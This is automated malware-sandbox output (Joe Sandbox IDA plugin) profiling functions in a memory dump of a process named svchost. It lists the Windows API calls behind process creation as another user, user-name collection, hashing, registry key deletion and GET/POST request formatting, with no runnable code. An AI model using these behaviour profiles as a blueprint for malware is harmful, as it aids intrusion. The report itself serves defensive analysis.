Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: 3aadd5819e9fa007419ff1cef333f5c46ed5985831ff0395b12e65586dcb84f4
Instruction ID: f3704baa07faa743e1d909979757a3056d3c09489fb49b5b9c1146358492ed80
Opcode Fuzzy Hash: 3aadd5819e9fa007419ff1cef333f5c46ed5985831ff0395b12e65586dcb84f4
Instruction Fuzzy Hash: 22212CBEC01209FBEF11DFE4D9087AEBAB9AF0431AF284455D905F2094E7744A64CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028938A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 028938B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 028938D6
RtlAllocateHeap.NTDLL(00000000), ref: 028938DD
_vsnprintf.MSVCRT ref: 028938F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0289390C
HeapFree.KERNEL32(00000000), ref: 02893913

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: 6954a1f750304ef9a0539cc65ab4264ff834a3dfd589e28039d88b4b744b2b68
Instruction ID: 6120a98dd6c635cb715ff5c390ce207603b352d98ad4fa38c290db71fd03984b
Opcode Fuzzy Hash: 6954a1f750304ef9a0539cc65ab4264ff834a3dfd589e28039d88b4b744b2b68
Instruction Fuzzy Hash: C8017CBE6402097FEB126BA48C05FBB766CEB46651F084865FE1AD6240E634D9118B61

Uniqueness

Uniqueness Score: -1.00%

Function 02894423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(028930CE,00000000,?,028930CE,?), ref: 02894433
GetProcessHeap.KERNEL32(00000008), ref: 02894447
RtlAllocateHeap.NTDLL(00000000), ref: 0289444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02894465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02894471
HeapFree.KERNEL32(00000000), ref: 02894478

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: ac6c76b55c9e06e6d4fc35f752c296d60ac859755cf9d2975666d4b04e883e5f
Instruction ID: 725b28402eaee56080d505d271b4a27771f73efa51f041aee7baf87eb00b74dd
Opcode Fuzzy Hash: ac6c76b55c9e06e6d4fc35f752c296d60ac859755cf9d2975666d4b04e883e5f
Instruction Fuzzy Hash: CBF068BD556112ABDB210F26AC0CE6BBF6CEFC6715F09C918F545C2144E7308416CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 028916FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,028917FB,00000001), ref: 02891708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02891722
RtlAllocateHeap.NTDLL(00000000), ref: 02891729
ExpandEnvironmentStringsA.KERNEL32(0289138F,00000000,-00000040), ref: 0289173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02891747
HeapFree.KERNEL32(00000000), ref: 0289174E

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: 920661469ad48e848ee9eb85e063421b950a9c2f9c07e7bf5f73ad23c9afc4ca
Instruction ID: ce06fe75460404f607ba008f713724e7cf75aae653287585b322854262a1b89f
Opcode Fuzzy Hash: 920661469ad48e848ee9eb85e063421b950a9c2f9c07e7bf5f73ad23c9afc4ca
Instruction Fuzzy Hash: 16F054BDA5821377DB215B74AC0CF5BBAADABC9655F0D0824F94DD6188E731C8148A60

Uniqueness

Uniqueness Score: -1.00%

Function 02893332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,028960A0), ref: 0289333C
QueryPerformanceCounter.KERNEL32(?), ref: 0289334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02893372
GetTickCount.KERNEL32 ref: 0289337A

Strings

&%c=%u, xrefs: 02893332

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: 48ccd5a9d513d3f8018626e3510a32c1acb1ebef4a9979fe4250ad36092ddabf
Instruction ID: 76981d21dc5cbf7d7c1a296ffb5d842c6a883116bdd0414dd393f7e1c53091fd
Opcode Fuzzy Hash: 48ccd5a9d513d3f8018626e3510a32c1acb1ebef4a9979fe4250ad36092ddabf
Instruction Fuzzy Hash: 26F01D7DE60108AFDF10DFE4EC45AADBBB9FB44305F0C4894F509E2190DB31A6209B11

Uniqueness

Uniqueness Score: -1.00%

Function 0289175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02891784

Part of subcall function 028916FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,028917FB,00000001), ref: 02891708

GetProcessHeap.KERNEL32(00000000,?), ref: 0289180F
HeapFree.KERNEL32(00000000), ref: 02891816

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: d533fc6565e2ed9b815470a9105927699b597ededd87ad7852918630062e2509
Instruction ID: dd7e3866a55b94a82146d978f5a9a558ecdd70280c29f3134f477b3b324aa236
Opcode Fuzzy Hash: d533fc6565e2ed9b815470a9105927699b597ededd87ad7852918630062e2509
Instruction Fuzzy Hash: BC31D47E61C317AFEF169FA49848B3A77E8AF45355F1C0429F489D6148EB31D401CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02895348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02895367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,028950BA,00000000), ref: 0289537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,028950BA,00000000), ref: 0289538C
RtlAllocateHeap.NTDLL(00000000), ref: 02895393
lstrcpy.KERNEL32(00000000,?), ref: 028953A3

Part of subcall function 02894543: StrStrIA.SHLWAPI(?,?,?,?,0289712C,028962E4,02897224,?), ref: 02894563

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: e832657efe3fd814d3989316e07d5549c281949b53c0c3d37f4f0b8e21854e15
Instruction ID: 3dbc0a3dbd6d8bc539d42cacc71160b5fef54ef7f5b39666328ae61130e92e15
Opcode Fuzzy Hash: e832657efe3fd814d3989316e07d5549c281949b53c0c3d37f4f0b8e21854e15
Instruction Fuzzy Hash: 8D119ABED5412DABEF01EBE8DC05CFFB3ACFB05604B0C0416F906D6144EA6496058BAA

Uniqueness

Uniqueness Score: -1.00%

Function 02893763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,028936F0,02891134,?), ref: 0289378E
RtlAllocateHeap.NTDLL(00000000,?,028936F0), ref: 02893795
_vsnprintf.MSVCRT ref: 028937AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,028936F0,02891134,?), ref: 028937EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,028936F0,02891134,?), ref: 028937F3

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: 718ebdf11b7a2649f137ded23e5cf8c5be9b0f1caf88663d8b1dff27db62496b
Instruction ID: 5aeb6710bb89b4c2bc21e0c4fc0f4aa9728b3f5a227652d50aa59e1e6ebc86a3
Opcode Fuzzy Hash: 718ebdf11b7a2649f137ded23e5cf8c5be9b0f1caf88663d8b1dff27db62496b
Instruction Fuzzy Hash: F501C8BE5842167FEF112BB4AC05F677A6AEF85364F0C4864FA08C1154FA3288218B61

Uniqueness

Uniqueness Score: -1.00%

Function 02894F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02894F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02894F84
CloseHandle.KERNEL32(00000000), ref: 02894F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02894FB5
HeapFree.KERNEL32(00000000), ref: 02894FBC

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: d696f18be83b9924a5affdaaf95e3cd7444fd1d3892e47f09dbf32ad12ba1d7d
Instruction ID: f05d74e8c052d2d511802711cd106dca67609d0dc4c55b1ae18bfcfcde160353
Opcode Fuzzy Hash: d696f18be83b9924a5affdaaf95e3cd7444fd1d3892e47f09dbf32ad12ba1d7d
Instruction Fuzzy Hash: B3F0B47EC4552ABFDF215FA0DC08B9EBB68EF05725F184710F909D5094D7304A228BE1

Uniqueness

Uniqueness Score: -1.00%

Function 028921C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02892225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 0289225A
RtlAllocateHeap.NTDLL(00000000), ref: 02892261

Strings

f<v, xrefs: 028923B0

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: ee4cc4bba459400dab4571e79e1eea8b5e749c0037eab6d6761faf7f56bb6fde
Instruction ID: 7569d52f4302b8b6fe86d4e7a6fbff217b40d7095ee511cac4681e3ef6345f4e
Opcode Fuzzy Hash: ee4cc4bba459400dab4571e79e1eea8b5e749c0037eab6d6761faf7f56bb6fde
Instruction Fuzzy Hash: B681A2BE908251ABD721DFA4DC40A67BBECAF45344F0D486EFC89D3294E7749904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0289315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 028932A2
RtlAllocateHeap.NTDLL(00000000), ref: 028932AF

Strings

GET, xrefs: 028931D0, 028931DC
POST, xrefs: 028931B9

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: 1607c7aa55ed0525e72e2e1ced06f2c473db892072735750c8dbc06cc445b4c9
Instruction ID: dd973760fe34e91005c05579d22661d4ff6ef967722f48312ecda0ba8df7540a
Opcode Fuzzy Hash: 1607c7aa55ed0525e72e2e1ced06f2c473db892072735750c8dbc06cc445b4c9
Instruction Fuzzy Hash: 51516BB9654346AFEB208F65DC84F2BBBECFB84605F084D1DB996C2194DB34D8188F61

Uniqueness

Uniqueness Score: -1.00%

Function 02893923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0289392F
memset.MSVCRT ref: 02893983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 028939B3

Strings

D, xrefs: 0289398B

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: 5794bffba1c75ef67bb9a23eecc2b68cb09a333bfde3bf1105e122d0ebe2303a
Instruction ID: 90efffd3c9a54ad8d645c99ba688f950277b1132ec7851ad4a17cf2940d0b2a2
Opcode Fuzzy Hash: 5794bffba1c75ef67bb9a23eecc2b68cb09a333bfde3bf1105e122d0ebe2303a
Instruction Fuzzy Hash: A511A87A814219AFC710AF21DC04D5BBFACEF85758F0A0A19FD55D2190D73299148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 02894EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02894EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02894F35

Part of subcall function 028949EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000), ref: 02894A7A
Part of subcall function 028949EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000,?,?,?), ref: 02894A81
Part of subcall function 028949EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000), ref: 02894A92
Part of subcall function 028949EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000,?,?,?), ref: 02894A99

ResumeThread.KERNEL32(028949A2,?,?,?), ref: 02894F51
CloseHandle.KERNEL32(028949A2,?,?,?), ref: 02894F5A

Strings

D, xrefs: 02894F02

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: b47d54608332a99696dd399f14a6cee3b41109e741cd5f438198db53fda5bffd
Instruction ID: a15f543579843e97c19e0b00be11bcc332f0ebd1c08fc1be2adcbc817ef8c0b1
Opcode Fuzzy Hash: b47d54608332a99696dd399f14a6cee3b41109e741cd5f438198db53fda5bffd
Instruction Fuzzy Hash: 0B011EBA90020DBFEF419AE8DC85DFFB7BDFB48314F040865F605E6060E6359E148A65

Uniqueness

Uniqueness Score: -1.00%

Function 028927E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 028927F9
CreateProcessW.KERNEL32(00000000,028962F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02892825
ExitProcess.KERNEL32 ref: 0289282C

Strings

D, xrefs: 02892800

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: 76690e689c5140689c73332752fe4f4c2ac166c74e463cd0adbcd1574eb4a495
Instruction ID: f50a600cc3ade105cd2257a73a7af3fe710bd34c4b0961d607293461bccd2db2
Opcode Fuzzy Hash: 76690e689c5140689c73332752fe4f4c2ac166c74e463cd0adbcd1574eb4a495
Instruction Fuzzy Hash: 02E0C9F584064C7EEB409AF8CD85EABB7ACAB08704F040835A706E6054E6789A1C8A66

Uniqueness

Uniqueness Score: -1.00%

Function 02895208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0289525E
Sleep.KERNEL32(00001388), ref: 02895271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0289528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02895327
GetProcessHeap.KERNEL32(00000000,?), ref: 02895333

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: 610e61f4a71a99669abd83190b0097ef7a90850b4ed72eb67593ac70d2843d82
Instruction ID: 761112b466c33c284398069324366563fba8924498ad28882241ed4a4620811a
Opcode Fuzzy Hash: 610e61f4a71a99669abd83190b0097ef7a90850b4ed72eb67593ac70d2843d82
Instruction Fuzzy Hash: 7641D2795043009BDB22DFA4C848B6BB7E8EF85319F8C0E1DF599D2190D738D508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02895B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02895B64

Part of subcall function 02892F1A: CryptAcquireContextW.ADVAPI32(02897658,00000000,00000000,00000001,F0000000,028962B0,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F35
Part of subcall function 02892F1A: CryptCreateHash.ADVAPI32(02897658,00008003,00000000,00000000,?,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F52
Part of subcall function 02892F1A: CryptHashData.ADVAPI32(?,02897658,?,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F68
Part of subcall function 02892F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F83
Part of subcall function 02892F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02895B88,?,00000000,?), ref: 02892FA3
Part of subcall function 02892F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892FB3
Part of subcall function 02892F1A: CryptReleaseContext.ADVAPI32(02897658,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892FC2

Part of subcall function 028944D2: wsprintfA.USER32 ref: 02894509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02895BF4

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: 78b8145ce5f704bb96e9a9c73353b34e755cde80eafd5e2590361659c9a320a1
Instruction ID: a03fb3ab28346b6dcc9a9fe3e68779aaccae296dd029dca0bca05919f3baf47c
Opcode Fuzzy Hash: 78b8145ce5f704bb96e9a9c73353b34e755cde80eafd5e2590361659c9a320a1
Instruction Fuzzy Hash: CF21E1BE4542489FEF12CFA8CC84AEEBBACEB05314F5C0456F90AD6102D725D244CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02893803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02893904,?,00000000,00000000,00000000,00000007,?,?), ref: 02893855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02893904), ref: 0289385C

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 073c138f2deca671c0dff8b59e849113b15e5ef10d5bea552767d5ad075fe064
Instruction ID: 42bf53a8ef4d04728031ce4885ce6e59c5b65835f73d277a718eff41fef07148
Opcode Fuzzy Hash: 073c138f2deca671c0dff8b59e849113b15e5ef10d5bea552767d5ad075fe064
Instruction Fuzzy Hash: 7711AC7EA143018FCB318F68D884B66B7E9AF89704F1C48ADE5DAE7244D730E842CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0289540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0289542D
RtlAllocateHeap.NTDLL(00000000), ref: 02895434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02895496
HeapFree.KERNEL32(00000000), ref: 0289549D

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: e89ad9b2f6ff89332b63ca0cad2fb81f75ea9da1a90b99f98268e8c9e64e26cb
Instruction ID: b54c3c638408cf455d058953287e0c9fca2c9feea0b25109b2dd5dac35bb92d0
Opcode Fuzzy Hash: e89ad9b2f6ff89332b63ca0cad2fb81f75ea9da1a90b99f98268e8c9e64e26cb
Instruction Fuzzy Hash: A8113ABE9002046BCF529EB99C48EA7B76DAB8A611F4C8565FE48D7144EA34D4018BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02894AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000), ref: 02894AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02894ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02894B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02894B11

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: a7ad8cac0175a38dc94268c278bb8bbc863ea80893db4c8ee668fd35fbf11b6a
Instruction ID: cb38e8b6844f97a6eebf75679f2f9d3b94247c4bd01ce4c389f173adb9191349
Opcode Fuzzy Hash: a7ad8cac0175a38dc94268c278bb8bbc863ea80893db4c8ee668fd35fbf11b6a
Instruction Fuzzy Hash: DC112ABDA40702AFEB619F79DC05B16B7E4AF04705F0C8929F68AC6194EB31D421DF15

Uniqueness

Uniqueness Score: -1.00%

Function 02891496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 028914DF
HeapFree.KERNEL32(00000000), ref: 028914E6

Strings

!, xrefs: 028914A3
!, xrefs: 028914C6

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: fc5db24afb97f370c00068e93843e9ba723d587f28900779bb980e8328444dab
Instruction ID: d8c0042959d0849abe74f810774a05f44cd3f0d374748ff95d703ba834905227
Opcode Fuzzy Hash: fc5db24afb97f370c00068e93843e9ba723d587f28900779bb980e8328444dab
Instruction Fuzzy Hash: CEF0C27E6682056EFF105A64DC0DBF67B8EDB09750F4C8010FD0DC5280EA70D8908690

Uniqueness

Uniqueness Score: -1.00%

Function 028925E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02897328), ref: 028925F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02892612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02892623
GetLastError.KERNEL32 ref: 0289262D

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: 4eb78bd21c5b876d386141d0aed2f71d1b214cb77a290757f8a30e54be259022
Instruction ID: 8f94f1c83aeaa6d8b3e2ece5df5ae21759edbcf9d854c38245b2b9c5558c1f1e
Opcode Fuzzy Hash: 4eb78bd21c5b876d386141d0aed2f71d1b214cb77a290757f8a30e54be259022
Instruction Fuzzy Hash: 81F05479A54249BBEB2156B6AC4DEBFBBBCEFC5B05F48402EF809C1180EB159414CB35

Uniqueness

Uniqueness Score: -1.00%

Function 028949EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000), ref: 02894A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000,?,?,?), ref: 02894A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000), ref: 02894A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02894F4C,?,00000000,?,?,?), ref: 02894A99

Part of subcall function 02894B3F: lstrcpy.KERNEL32(-00000469,?), ref: 02894C69

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: e7d1706e2710b01931896bcc5df6771695ac6ae578d4d6b133bd79f701f5fcf6
Instruction ID: 0e2860f8177c2a627358164cbb29da93a6f2dda3a5c43ac426080fb68e99d998
Opcode Fuzzy Hash: e7d1706e2710b01931896bcc5df6771695ac6ae578d4d6b133bd79f701f5fcf6
Instruction Fuzzy Hash: 8D21EA7E8083159FC710DFA8D84494BBBE8FB88354F48492EF589D7240EB34D9559F86

Uniqueness

Uniqueness Score: -1.00%

Function 0289136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 028913EC
HeapFree.KERNEL32(00000000), ref: 028913F3

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a7781a5821a06d21af41705c3ab48978e27196ba70cf064107230288141f1d6c
Instruction ID: 98dc0859d5dd984f2ae6d461b5ecaa5285ae96cce10aaf427f6775fa239aba0b
Opcode Fuzzy Hash: a7781a5821a06d21af41705c3ab48978e27196ba70cf064107230288141f1d6c
Instruction Fuzzy Hash: EF114FBED1420AAFDF00DFE98848B9EBBBCAB48351F184465E60CE2540E77586149BA1

Uniqueness

Uniqueness Score: -1.00%

